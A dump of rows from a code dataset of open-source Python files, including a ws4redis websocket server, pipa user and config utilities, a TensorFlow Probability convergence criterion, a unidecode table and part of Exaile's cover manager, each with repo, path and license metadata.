repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
woozzu/pylearn2 | pylearn2/linear/linear_transform.py | 49 | 1917 | """
.. todo::
WRITEME
"""
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
class LinearTransform(object):
"""
A generic class describing a LinearTransform. Derived classes may implement linear
transformation as a dense matrix multiply, a convolution, etc.
Classes inheriting from this should also inherit from TheanoLinear's LinearTransform
This class does not directly inherit from TheanoLinear's LinearTransform because
most LinearTransform classes in pylearn2 will inherit from a TheanoLinear derived
class and don't want to end up inheriting from TheanoLinear by two paths
This class is basically just here as a placeholder to show you what extra methods you
need to add to make a TheanoLinear LinearTransform work with pylearn2
"""
def get_params(self):
"""
Return a list of parameters that govern the linear transformation
"""
raise NotImplementedError()
def get_weights_topo(self):
"""
Return a batch of filters, formatted topologically.
This only really makes sense if you are working with a topological space,
such as for a convolution operator.
If your transformation is defined on a VectorSpace then some other class
like a ViewConverter will need to transform your vector into a topological
space; you are not responsible for doing so here.
"""
raise NotImplementedError()
def set_batch_size(self, batch_size):
"""
Some transformers such as Conv2D have a fixed batch size.
Use this method to change the batch size.
Parameters
----------
batch_size : int
The size of the batch
"""
pass
| bsd-3-clause |
jrief/django-websocket-redis | ws4redis/wsgi_server.py | 2 | 8452 | # -*- coding: utf-8 -*-
import sys
import logging
import six
from six.moves import http_client
from redis import StrictRedis
import django
if django.VERSION[:2] >= (1, 7):
django.setup()
from django.conf import settings
from django.contrib.auth import get_user
from django.core.handlers.wsgi import WSGIRequest
from django.core.exceptions import PermissionDenied
from django import http
from django.utils.encoding import force_str
from django.utils.functional import SimpleLazyObject
from ws4redis import settings as private_settings
from ws4redis.redis_store import RedisMessage
from ws4redis.exceptions import WebSocketError, HandshakeError, UpgradeRequiredError
logger = logging.getLogger('django.request')
try:
# django >= 1.8 && python >= 2.7
# https://docs.djangoproject.com/en/1.8/releases/1.7/#django-utils-dictconfig-django-utils-importlib
from importlib import import_module
except ImportError:
# RemovedInDjango19Warning: django.utils.importlib will be removed in Django 1.9.
from django.utils.importlib import import_module
try:
# django >= 1.7
from django.utils.module_loading import import_string
except ImportError:
# django >= 1.5
from django.utils.module_loading import import_by_path as import_string
class WebsocketWSGIServer(object):
def __init__(self, redis_connection=None):
"""
redis_connection can be overriden by a mock object.
"""
comps = str(private_settings.WS4REDIS_SUBSCRIBER).split('.')
module = import_module('.'.join(comps[:-1]))
Subscriber = getattr(module, comps[-1])
self.possible_channels = Subscriber.subscription_channels + Subscriber.publish_channels
self._redis_connection = redis_connection and redis_connection or StrictRedis(**private_settings.WS4REDIS_CONNECTION)
self.Subscriber = Subscriber
self._websockets = set() # a list of currently active websockets
def assure_protocol_requirements(self, environ):
if environ.get('REQUEST_METHOD') != 'GET':
raise HandshakeError('HTTP method must be a GET')
if environ.get('SERVER_PROTOCOL') != 'HTTP/1.1':
raise HandshakeError('HTTP server protocol must be 1.1')
if environ.get('HTTP_UPGRADE', '').lower() != 'websocket':
raise HandshakeError('Client does not wish to upgrade to a websocket')
def process_request(self, request):
request.session = None
request.user = None
session_key = request.COOKIES.get(settings.SESSION_COOKIE_NAME, None)
if session_key is not None:
engine = import_module(settings.SESSION_ENGINE)
request.session = engine.SessionStore(session_key)
request.user = SimpleLazyObject(lambda: get_user(request))
def process_subscriptions(self, request):
agreed_channels = []
echo_message = False
for qp in request.GET:
param = qp.strip().lower()
if param in self.possible_channels:
agreed_channels.append(param)
elif param == 'echo':
echo_message = True
return agreed_channels, echo_message
@property
def websockets(self):
return self._websockets
def __call__(self, environ, start_response):
"""
Hijack the main loop from the original thread and listen on events on the Redis
and the Websocket filedescriptors.
"""
websocket = None
subscriber = self.Subscriber(self._redis_connection)
try:
self.assure_protocol_requirements(environ)
request = WSGIRequest(environ)
if isinstance(private_settings.WS4REDIS_PROCESS_REQUEST, six.string_types):
import_string(private_settings.WS4REDIS_PROCESS_REQUEST)(request)
elif callable(private_settings.WS4REDIS_PROCESS_REQUEST):
private_settings.WS4REDIS_PROCESS_REQUEST(request)
else:
self.process_request(request)
channels, echo_message = self.process_subscriptions(request)
if callable(private_settings.WS4REDIS_ALLOWED_CHANNELS):
channels = list(private_settings.WS4REDIS_ALLOWED_CHANNELS(request, channels))
elif private_settings.WS4REDIS_ALLOWED_CHANNELS is not None:
try:
mod, callback = private_settings.WS4REDIS_ALLOWED_CHANNELS.rsplit('.', 1)
callback = getattr(import_module(mod), callback, None)
if callable(callback):
channels = list(callback(request, channels))
except AttributeError:
pass
websocket = self.upgrade_websocket(environ, start_response)
self._websockets.add(websocket)
logger.debug('Subscribed to channels: {0}'.format(', '.join(channels)))
subscriber.set_pubsub_channels(request, channels)
websocket_fd = websocket.get_file_descriptor()
listening_fds = [websocket_fd]
redis_fd = subscriber.get_file_descriptor()
if redis_fd:
listening_fds.append(redis_fd)
subscriber.send_persisted_messages(websocket)
recvmsg = None
while websocket and not websocket.closed:
ready = self.select(listening_fds, [], [], 4.0)[0]
if not ready:
# flush empty socket
websocket.flush()
for fd in ready:
if fd == websocket_fd:
recvmsg = RedisMessage(websocket.receive())
if recvmsg:
subscriber.publish_message(recvmsg)
elif fd == redis_fd:
sendmsg = RedisMessage(subscriber.parse_response())
if sendmsg and (echo_message or sendmsg != recvmsg):
websocket.send(sendmsg)
else:
logger.error('Invalid file descriptor: {0}'.format(fd))
# Check again that the websocket is closed before sending the heartbeat,
# because the websocket can closed previously in the loop.
if private_settings.WS4REDIS_HEARTBEAT and not websocket.closed:
websocket.send(private_settings.WS4REDIS_HEARTBEAT)
# Remove websocket from _websockets if closed
if websocket.closed:
self._websockets.remove(websocket)
except WebSocketError as excpt:
logger.warning('WebSocketError: {}'.format(excpt), exc_info=sys.exc_info())
response = http.HttpResponse(content='Websocket Closed')
# bypass status code validation in HttpResponse constructor -- necessary for Django v1.11
response.status_code = 1001
except UpgradeRequiredError as excpt:
logger.info('Websocket upgrade required')
response = http.HttpResponseBadRequest(status=426, content=excpt)
except HandshakeError as excpt:
logger.warning('HandshakeError: {}'.format(excpt), exc_info=sys.exc_info())
response = http.HttpResponseBadRequest(content=excpt)
except PermissionDenied as excpt:
logger.warning('PermissionDenied: {}'.format(excpt), exc_info=sys.exc_info())
response = http.HttpResponseForbidden(content=excpt)
except Exception as excpt:
logger.error('Other Exception: {}'.format(excpt), exc_info=sys.exc_info())
response = http.HttpResponseServerError(content=excpt)
else:
response = http.HttpResponse()
finally:
subscriber.release()
if websocket:
websocket.close(code=1001, message='Websocket Closed')
else:
logger.warning('Starting late response on websocket')
status_text = http_client.responses.get(response.status_code, 'UNKNOWN STATUS CODE')
status = '{0} {1}'.format(response.status_code, status_text)
headers = response._headers.values()
if six.PY3:
headers = list(headers)
start_response(force_str(status), headers)
logger.info('Finish non-websocket response with status code: {}'.format(response.status_code))
return response
| mit |
Ivoz/pipa | pipa/util.py | 1 | 4565 | import os
import random
import string
from configparser import ConfigParser
from hashlib import sha256
import cherrypy
from cherrypy import Tool
from cherrypy._cpcompat import ntob
from cherrypy._cpreqbody import Part
from cherrypy.lib import httputil
defaults = """
[pipa]
host = localhost
port = 5351
key = server.key
cert = bundle.pem
salt = fj48fn4kvi548gj56j20f934nvo490dsj3nv
packages = packages
[users]
"""
def user_mod(**args):
conf = get_config(args['conf_file'])
if not conf.has_section('users'):
conf.add_section('users')
if args['list']:
for user in conf.options('users'):
print(user)
elif args['add']:
user = args['add'][0]
password = args['add'][1]
password = digest(password, conf['pipa'])
conf.set('users', user, password)
with open(args['conf_file'], 'w') as c:
conf.write(c)
elif args['delete']:
user = args['delete'][0]
if conf.has_option('users', user):
conf.remove_option('users', user)
with open(args['conf_file'], 'w') as c:
conf.write(c)
else:
print('user "%s" not found in %s' % (user, args['conf_file']))
def do_init(salt=None, packages=None, conf_file=None, no_certs=False):
print('Generating config...')
if salt is None:
letters = string.ascii_letters + string.digits
salt = ''.join(random.choice(letters) for i in range(32))
packages = packages or 'packages'
if not os.path.isdir(packages):
os.makedirs(packages)
config = get_config()
config['pipa']['salt'] = salt
config['pipa']['packages'] = packages
with open(conf_file, 'w') as c:
config.write(c)
print('Config written!')
if not no_certs:
from .certs import gen_certs
gen_certs()
def get_config(conf_file=None):
config = ConfigParser()
config.read_string(defaults)
if conf_file is not None:
config.read(conf_file)
return config
def digest(password, conf=None):
if conf is None:
conf = cherrypy.request.app.root.pipa
p = ntob(password)
s = ntob(conf['salt'])
digest = sha256(b'36'*16).digest()
for i in range(5000):
digest = sha256(digest + s + p + digest).digest()
return sha256(digest + s + p + digest).hexdigest()
class DistUtilsPart(Part):
def read_headers(cls, fp):
headers = httputil.HeaderMap()
while True:
line = fp.readline()
if not line:
# No more data--illegal end of headers
raise EOFError("Illegal end of headers.")
if line == ntob('\n'):
# Normal end of headers
break
# if not line.endswith(ntob('\r\n')):
# raise ValueError("MIME requires CRLF terminators: %r" % line)
if line[0] in ntob(' \t'):
# It's a continuation line.
v = line.strip().decode('ISO-8859-1')
else:
k, v = line.split(ntob(":"), 1)
k = k.strip().decode('ISO-8859-1')
v = v.strip().decode('ISO-8859-1')
existing = headers.get(k)
if existing:
v = ", ".join((existing, v))
headers[k] = v
return headers
read_headers = classmethod(read_headers)
def distutils_form(force=True, debug=False):
request = cherrypy.serving.request
def process(entity):
entity.part_class = DistUtilsPart
cherrypy._cpreqbody.process_multipart(entity)
kept_parts = []
for part in entity.parts:
if part.name is None:
kept_parts.append(part)
else:
if part.filename is None:
# It's a regular field
value = part.fullvalue()
else:
# It's a file upload. Retain the whole part so consumer
# code has access to its .file and .filename attributes.
value = part
if part.name in entity.params:
if not isinstance(entity.params[part.name], list):
entity.params[part.name] = [entity.params[part.name]]
entity.params[part.name].append(value)
else:
entity.params[part.name] = value
entity.parts = kept_parts
request.body.processors['multipart/form-data'] = process
DistutilsUpload = Tool('before_request_body', distutils_form)
| mit |
ScholarTools/crossref_api_python | crossref/utils.py | 1 | 3636 | # -*- coding: utf-8 -*-
"""
#TODO: break out display utils to another module
"""
def display_class(class_instance,pv,method_pv=None):
#TODO: Handle methods
return ('%s:\n' % type(class_instance)
+ property_values_to_string(pv,extra_indentation=4))
def float_or_none_to_string(x):
if x is None:
return 'None'
else:
return '%0.2f'%x
def property_values_to_string(pv,extra_indentation = 0):
"""
Parameters
----------
pv : OrderedDict
Keys are properties, values are values
"""
# Max length
keys = pv[::2]
values = pv[1::2]
key_lengths = [len(x) for x in keys]
max_key_length = max(key_lengths) + extra_indentation
space_padding = [max_key_length - x for x in key_lengths]
key_display_strings = [' ' * x + y for x, y in zip(space_padding, keys)]
str = u''
for (key, value) in zip(key_display_strings, values):
str += '%s: %s\n' % (key, value)
return str
def get_list_class_display(value):
"""
TODO: Go from a list of objects to:
[class name] len(#)
"""
if value is None:
return 'None'
elif isinstance(value,list):
#Check for 0 length
try:
if len(value) == 0:
return u'[??] len(0)'
else:
return u'[%s] len(%d)' % (value[0].__class__.__name__,len(value))
except:
import pdb
pdb.set_trace()
#run the code
else:
return u'<%s>' % (value.__class__.__name__)
def get_truncated_display_string(input_string,max_length = 50):
#TODO: We should really check for non-string and convert
if input_string is None:
return None
elif isinstance(input_string,list):
input_string = '%s'%input_string
elif isinstance(input_string,dict):
input_string = '%s'%input_string
if len(input_string) > max_length:
return input_string[:max_length] + '...'
else:
return input_string
def user_name_to_file_name(user_name):
"""
Provides a standard way of going from a user_name to something that will
be unique (should be ...) for files
NOTE: NO extensions are added
See Also:
utils.get_save_root
"""
#Create a valid save name from the user_name (email)
#----------------------------------------------------------------------
#Good enough for now ...
#Removes periods from email addresses, leaves other characters
return user_name.replace('.','')
def get_unnasigned_json(json_data,populated_object):
"""
Given an object which has had fields assigned to it, as well as the
JSON dict from which these values were retrieved, this function returns
a list of keys that were not used for populating the object.
In order to match the attribute names and dictionary keys must have the
same names.
"""
if len(json_data) == 0:
return {}
else:
temp_keys = populated_object.__dict__.keys()
return dict((key,json_data[key]) for key in set(json_data) if key not in temp_keys)
def assign_json(json_data, field_name, optional=True, default=None):
"""
This function can be used to make an assignment to an object. Since the
majority of returned json repsonses contain optional fields.
"""
if field_name in json_data:
return json_data[field_name]
elif optional:
return default
else:
raise Exception("TODO: Fix me")
def clean_dict_keys(d):
return {x.replace('-', '_'): d[x] for x in d.keys()} | mit |
deepsrijit1105/edx-platform | cms/lib/xblock/tagging/migrations/0001_initial.py | 39 | 1187 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='TagAvailableValues',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.CharField(max_length=255)),
],
options={
'ordering': ('id',),
},
),
migrations.CreateModel(
name='TagCategories',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255, unique=True)),
('title', models.CharField(max_length=255)),
],
options={
'ordering': ('title',),
},
),
migrations.AddField(
model_name='tagavailablevalues',
name='category',
field=models.ForeignKey(to='tagging.TagCategories'),
),
]
| agpl-3.0 |
kr41/ggrc-core | src/ggrc_workflows/models/cycle_task_entry.py | 7 | 1350 | # Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module containing the workflow CycleTaskEntry model."""
from sqlalchemy.ext.hybrid import hybrid_property
from ggrc import db
from ggrc.models.mixins import Base, Described
from ggrc.models.object_document import Documentable
class CycleTaskEntry(Described, Documentable, Base, db.Model):
"""Workflow CycleTaskEntry model."""
__tablename__ = 'cycle_task_entries'
_is_declining_review = db.Column(db.Boolean, nullable=True)
cycle_id = db.Column(
db.Integer,
db.ForeignKey('cycles.id', ondelete="CASCADE"),
nullable=False,
)
cycle_task_group_object_task_id = db.Column(
db.Integer,
db.ForeignKey('cycle_task_group_object_tasks.id', ondelete="CASCADE"),
nullable=False,
)
cycle_task_group_object_task = db.relationship(
'CycleTaskGroupObjectTask',
foreign_keys='CycleTaskEntry.cycle_task_group_object_task_id',
backref='cycle_task_entries',
)
_publish_attrs = [
'cycle',
'cycle_task_group_object_task',
'is_declining_review'
]
@hybrid_property
def is_declining_review(self):
return self._is_declining_review
@is_declining_review.setter
def is_declining_review(self, value):
self._is_declining_review = bool(value)
| apache-2.0 |
tensorflow/probability | tensorflow_probability/python/optimizer/convergence_criteria/convergence_criterion.py | 1 | 6013 | # Copyright 2019 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Base class for convergence criteria."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
class ConvergenceCriterion(object):
"""Base class for stopping rules.
A convergence criterion determines when an optimization has converged given
its history of losses, gradients, and parameter values. Each criterion is
responsible for propagating from step to step whatever state it needs to
represent the relevant aspects of that history (for example, a moving average
of previous loss values or gradients). In particular, subclasses must
implement:
- `_bootstrap(loss, grads, parameters)`: takes the
initial loss, gradients, and values of parameters, and returns a (structure
of) `Tensor`(s) representing the initial values of any auxiliary quantities
tracked by the convergence criterion.
- `_one_step(step, loss, grads, window_size, auxiliary_state)`: At
integer `step >= 1`,
takes the current loss, gradients, and values of parameters, along with
any auxiliary state carried over from the previous step, and returns
`(has_converged, updated_auxiliary_state)`, where `has_converged` is a
boolean `Tensor`, and `updated_auxiliary_state` is a (structure of)
Tensor(s) matching `auxiliary_state`, containing whatever information must
be propagated to the next timestep.
"""
def __init__(self, min_num_steps=None, name=None):
"""Constructs the `ConvergenceCriterion`.
This is a private method for subclass use.
Args:
min_num_steps: optional int `Tensor` minimum number of steps before
stopping. If set, subclass return values of `has_converged=True` will be
ignored until `step >= min_num_steps`.
Default value: `None`.
name: optional Python `str` name prefixed to ops created by this class.
"""
self._min_num_steps = tf.convert_to_tensor(min_num_steps, dtype=tf.int32)
self._name = name
@property
def min_num_steps(self):
return self._min_num_steps
@property
def name(self):
return self._name
def bootstrap(self, loss, grads, parameters):
"""Returns a structure of `Tensors` for the rule's state at step 0.
The shape of the `Tensor`s specifying `loss`, `grads`, and `parameters` may
optionally be prefixed by one or more batch dimension(s).
Args:
loss: float `Tensor` initial value of loss being optimized.
grads: list of float `Tensor` gradients of `loss` wrt `parameters`.
parameters: list of float `Tensor` initial values of parameters
being optimized.
Returns:
initial_auxiliary_state: (Structure of) `Tensor`(s) representing the
initial auxiliary state carried forward by this criterion.
"""
with tf.name_scope(self.name):
return self._bootstrap(
loss=tf.convert_to_tensor(loss),
grads=(tf.nest.map_structure(tf.convert_to_tensor, grads)
if grads is not None else grads),
parameters=tf.nest.map_structure(tf.convert_to_tensor, parameters))
def one_step(self, step, loss, grads, parameters, auxiliary_state):
"""Updates tracked quantities for a new step, and determines if converged.
The shape of the `Tensor`s specifying `loss`, `grads`, and `parameters` may
optionally be prefixed by one or more batch dimension(s). In this case,
the returned value `has_converged` will have shape equal to the broadcast
batch shape of whichever of those quantities is used by this convergence
criterion, and the quantities defining the convergence criterion (
`min_num_steps`, etc.).
Args:
step: integer `Tensor` index of the current step, where `step >= 1` (on
step `0`, `initial_state` should be called instead).
loss: float `Tensor` value of loss at the current step.
grads: list of float `Tensor` gradients of `loss` wrt `parameters`.
parameters: list of float `Tensor` current values of parameters
being optimized.
auxiliary_state: the (structure of) `Tensor`(s) containing state carried
forward from the previous step.
Returns:
has_converged: boolean `Tensor` indicating whether the optimization has
converged.
updated_auxiliary_state: (Structure of) `Tensor`(s) representing
updated quantities tracked by the convergence criterion. This should
match the structure of the value returned by `bootstrap`.
"""
with tf.name_scope(self.name):
has_converged, updated_auxiliary_state = self._one_step(
step=tf.convert_to_tensor(step),
loss=tf.convert_to_tensor(loss),
grads=(tf.nest.map_structure(tf.convert_to_tensor, grads)
if grads is not None else grads),
parameters=tf.nest.map_structure(tf.convert_to_tensor, parameters),
auxiliary_state=auxiliary_state)
if self.min_num_steps is not None:
has_converged = has_converged & (step >= self.min_num_steps)
return has_converged, updated_auxiliary_state
def _bootstrap(self, loss, grads, parameters):
raise NotImplementedError('`_bootstrap` not implemented.')
def _one_step(self, step, loss, grads, parameters, auxiliary_state):
raise NotImplementedError('`_one_step` not implemented.')
| apache-2.0 |
dpendl00/headphones | lib/unidecode/x0fe.py | 252 | 3825 | data = (
'[?]', # 0x00
'[?]', # 0x01
'[?]', # 0x02
'[?]', # 0x03
'[?]', # 0x04
'[?]', # 0x05
'[?]', # 0x06
'[?]', # 0x07
'[?]', # 0x08
'[?]', # 0x09
'[?]', # 0x0a
'[?]', # 0x0b
'[?]', # 0x0c
'[?]', # 0x0d
'[?]', # 0x0e
'[?]', # 0x0f
'[?]', # 0x10
'[?]', # 0x11
'[?]', # 0x12
'[?]', # 0x13
'[?]', # 0x14
'[?]', # 0x15
'[?]', # 0x16
'[?]', # 0x17
'[?]', # 0x18
'[?]', # 0x19
'[?]', # 0x1a
'[?]', # 0x1b
'[?]', # 0x1c
'[?]', # 0x1d
'[?]', # 0x1e
'[?]', # 0x1f
'', # 0x20
'', # 0x21
'', # 0x22
'~', # 0x23
'[?]', # 0x24
'[?]', # 0x25
'[?]', # 0x26
'[?]', # 0x27
'[?]', # 0x28
'[?]', # 0x29
'[?]', # 0x2a
'[?]', # 0x2b
'[?]', # 0x2c
'[?]', # 0x2d
'[?]', # 0x2e
'[?]', # 0x2f
'..', # 0x30
'--', # 0x31
'-', # 0x32
'_', # 0x33
'_', # 0x34
'(', # 0x35
') ', # 0x36
'{', # 0x37
'} ', # 0x38
'[', # 0x39
'] ', # 0x3a
'[(', # 0x3b
')] ', # 0x3c
'<<', # 0x3d
'>> ', # 0x3e
'<', # 0x3f
'> ', # 0x40
'[', # 0x41
'] ', # 0x42
'{', # 0x43
'}', # 0x44
'[?]', # 0x45
'[?]', # 0x46
'[?]', # 0x47
'[?]', # 0x48
'', # 0x49
'', # 0x4a
'', # 0x4b
'', # 0x4c
'', # 0x4d
'', # 0x4e
'', # 0x4f
',', # 0x50
',', # 0x51
'.', # 0x52
'', # 0x53
';', # 0x54
':', # 0x55
'?', # 0x56
'!', # 0x57
'-', # 0x58
'(', # 0x59
')', # 0x5a
'{', # 0x5b
'}', # 0x5c
'{', # 0x5d
'}', # 0x5e
'#', # 0x5f
'&', # 0x60
'*', # 0x61
'+', # 0x62
'-', # 0x63
'<', # 0x64
'>', # 0x65
'=', # 0x66
'', # 0x67
'\\', # 0x68
'$', # 0x69
'%', # 0x6a
'@', # 0x6b
'[?]', # 0x6c
'[?]', # 0x6d
'[?]', # 0x6e
'[?]', # 0x6f
'', # 0x70
'', # 0x71
'', # 0x72
'[?]', # 0x73
'', # 0x74
'[?]', # 0x75
'', # 0x76
'', # 0x77
'', # 0x78
'', # 0x79
'', # 0x7a
'', # 0x7b
'', # 0x7c
'', # 0x7d
'', # 0x7e
'', # 0x7f
'', # 0x80
'', # 0x81
'', # 0x82
'', # 0x83
'', # 0x84
'', # 0x85
'', # 0x86
'', # 0x87
'', # 0x88
'', # 0x89
'', # 0x8a
'', # 0x8b
'', # 0x8c
'', # 0x8d
'', # 0x8e
'', # 0x8f
'', # 0x90
'', # 0x91
'', # 0x92
'', # 0x93
'', # 0x94
'', # 0x95
'', # 0x96
'', # 0x97
'', # 0x98
'', # 0x99
'', # 0x9a
'', # 0x9b
'', # 0x9c
'', # 0x9d
'', # 0x9e
'', # 0x9f
'', # 0xa0
'', # 0xa1
'', # 0xa2
'', # 0xa3
'', # 0xa4
'', # 0xa5
'', # 0xa6
'', # 0xa7
'', # 0xa8
'', # 0xa9
'', # 0xaa
'', # 0xab
'', # 0xac
'', # 0xad
'', # 0xae
'', # 0xaf
'', # 0xb0
'', # 0xb1
'', # 0xb2
'', # 0xb3
'', # 0xb4
'', # 0xb5
'', # 0xb6
'', # 0xb7
'', # 0xb8
'', # 0xb9
'', # 0xba
'', # 0xbb
'', # 0xbc
'', # 0xbd
'', # 0xbe
'', # 0xbf
'', # 0xc0
'', # 0xc1
'', # 0xc2
'', # 0xc3
'', # 0xc4
'', # 0xc5
'', # 0xc6
'', # 0xc7
'', # 0xc8
'', # 0xc9
'', # 0xca
'', # 0xcb
'', # 0xcc
'', # 0xcd
'', # 0xce
'', # 0xcf
'', # 0xd0
'', # 0xd1
'', # 0xd2
'', # 0xd3
'', # 0xd4
'', # 0xd5
'', # 0xd6
'', # 0xd7
'', # 0xd8
'', # 0xd9
'', # 0xda
'', # 0xdb
'', # 0xdc
'', # 0xdd
'', # 0xde
'', # 0xdf
'', # 0xe0
'', # 0xe1
'', # 0xe2
'', # 0xe3
'', # 0xe4
'', # 0xe5
'', # 0xe6
'', # 0xe7
'', # 0xe8
'', # 0xe9
'', # 0xea
'', # 0xeb
'', # 0xec
'', # 0xed
'', # 0xee
'', # 0xef
'', # 0xf0
'', # 0xf1
'', # 0xf2
'', # 0xf3
'', # 0xf4
'', # 0xf5
'', # 0xf6
'', # 0xf7
'', # 0xf8
'', # 0xf9
'', # 0xfa
'', # 0xfb
'', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
'', # 0xff
)
| gpl-3.0 |
sjohannes/exaile | xlgui/cover.py | 2 | 39885 | # Copyright (C) 2008-2010 Adam Olsen
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#
# The developers of the Exaile media player hereby grant permission
# for non-GPL compatible GStreamer and Exaile plugins to be used and
# distributed together with GStreamer and Exaile. This permission is
# above and beyond the permissions granted by the GPL license by which
# Exaile is covered. If you modify this code, you may extend this
# exception to your version of the code, but you are not obligated to
# do so. If you do not wish to do so, delete this exception statement
# from your version.
import logging
import os
import os.path
import tempfile
import threading
import cairo
from gi.repository import Gio
from gi.repository import Gdk
from gi.repository import GdkPixbuf
from gi.repository import GLib
from gi.repository import GObject
from gi.repository import Gtk
from xl import common, event, providers, settings, xdg
from xl.covers import MANAGER as COVER_MANAGER
from xl.nls import gettext as _
from xlgui.widgets import dialogs, menu
from xlgui import guiutil
from xlgui.guiutil import pixbuf_from_data
logger = logging.getLogger(__name__)
def save_pixbuf(pixbuf, path, type_):
"""Save a pixbuf to a local file.
:param pixbuf: Pixbuf to save
:type pixbuf: GdkPixbuf.Pixbuf
:param path: Path of file to save to
:type path: str
:param type_: Type of image file. See GdkPixbuf.savev for valid values.
:type type_: str
:return: None
"""
# This wraps the horrible GdkPixbuf.savev API. Can be removed if one day
# PyGObject provides an override.
pixbuf.savev(path, type_, [None], [])
class CoverManager(GObject.GObject):
"""
Cover manager window
"""
__gsignals__ = {
'prefetch-started': (GObject.SignalFlags.RUN_LAST, None, ()),
'prefetch-progress': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'prefetch-completed': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'fetch-started': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'fetch-completed': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'fetch-progress': (GObject.SignalFlags.RUN_LAST, None, (GObject.TYPE_INT,)),
'cover-fetched': (
GObject.SignalFlags.RUN_LAST,
None,
(GObject.TYPE_PYOBJECT, GdkPixbuf.Pixbuf),
),
}
def __init__(self, parent, collection):
"""
Initializes the window
"""
GObject.GObject.__init__(self)
# List of identifiers of albums without covers
self.outstanding = []
# Map of album identifiers and their tracks
self.album_tracks = {}
self.outstanding_text = _('{outstanding} covers left to fetch')
self.completed_text = _('All covers fetched')
self.cover_size = (90, 90)
self.default_cover_pixbuf = pixbuf_from_data(
COVER_MANAGER.get_default_cover(), self.cover_size
)
builder = Gtk.Builder()
builder.add_from_file(xdg.get_data_path('ui', 'covermanager.ui'))
builder.connect_signals(self)
self.window = builder.get_object('window')
self.window.set_transient_for(parent)
self.message = dialogs.MessageBar(
parent=builder.get_object('content_area'), buttons=Gtk.ButtonsType.CLOSE
)
self.previews_box = builder.get_object('previews_box')
self.model = builder.get_object('covers_model')
# Map of album identifiers and model paths
self.model_path_cache = {}
self.menu = CoverMenu(self)
self.menu.attach_to_widget(self.previews_box, lambda menu, widget: True)
self.progress_bar = builder.get_object('progressbar')
self.progress_bar.set_text(_('Collecting albums and covers...'))
self.progress_bar.pulse_timeout = GLib.timeout_add(
100, self.on_progress_pulse_timeout
)
self.close_button = builder.get_object('close_button')
self.stop_button = builder.get_object('stop_button')
self.stop_button.set_sensitive(False)
self.fetch_button = builder.get_object('fetch_button')
self.window.show_all()
self.stopper = threading.Event()
thread = threading.Thread(
target=self.prefetch, name='CoverPrefetch', args=(collection,)
)
thread.daemon = True
thread.start()
def prefetch(self, collection):
"""
Collects all albums and sets the list of outstanding items
"""
albums = set()
for track in collection:
if self.stopper.is_set():
return
try:
artist = track.get_tag_raw('artist')[0]
album = track.get_tag_raw('album')[0]
except TypeError:
continue
if not album or not artist:
continue
album = (artist, album)
try:
self.album_tracks[album].append(track)
except KeyError:
self.album_tracks[album] = [track]
albums.add(album)
albums = sorted(albums)
outstanding = []
# Speed up the following loop
get_cover = COVER_MANAGER.get_cover
default_cover_pixbuf = self.default_cover_pixbuf
cover_size = self.cover_size
self.emit('prefetch-started')
for i, album in enumerate(albums):
if self.stopper.is_set():
return
cover_data = get_cover(self.album_tracks[album][0], set_only=True)
cover_pixbuf = pixbuf_from_data(cover_data) if cover_data else None
try:
thumbnail_pixbuf = cover_pixbuf.scale_simple(
*cover_size, interp_type=GdkPixbuf.InterpType.BILINEAR
)
except AttributeError: # cover_pixbuf is None
thumbnail_pixbuf = default_cover_pixbuf
outstanding.append(album)
label = u'{0} - {1}'.format(*album)
iter = self.model.append((album, thumbnail_pixbuf, label))
self.model_path_cache[album] = self.model.get_path(iter)
self.emit('prefetch-progress', i + 1)
self.outstanding = outstanding
self.emit('prefetch-completed', len(self.outstanding))
def fetch(self):
"""
Collects covers for all outstanding items
"""
self.emit('fetch-started', len(self.outstanding))
# Speed up the following loop
get_cover = COVER_MANAGER.get_cover
save = COVER_MANAGER.save
for i, album in enumerate(self.outstanding[:]):
if self.stopper.is_set():
# Allow for "fetch-completed" signal to be emitted
break
cover_data = get_cover(self.album_tracks[album][0], save_cover=True)
cover_pixbuf = pixbuf_from_data(cover_data) if cover_data else None
self.emit('fetch-progress', i + 1)
if not cover_pixbuf:
continue
self.outstanding.remove(album)
self.emit('cover-fetched', album, cover_pixbuf)
if i % 50 == 0:
logger.debug('Saving cover database')
save()
logger.debug('Saving cover database')
save()
self.emit('fetch-completed', len(self.outstanding))
def show_cover(self):
"""
Shows the currently selected cover
"""
paths = self.previews_box.get_selected_items()
if paths:
path = paths[0]
album = self.model[path][0]
track = self.album_tracks[album][0] # Arbitrary track in album
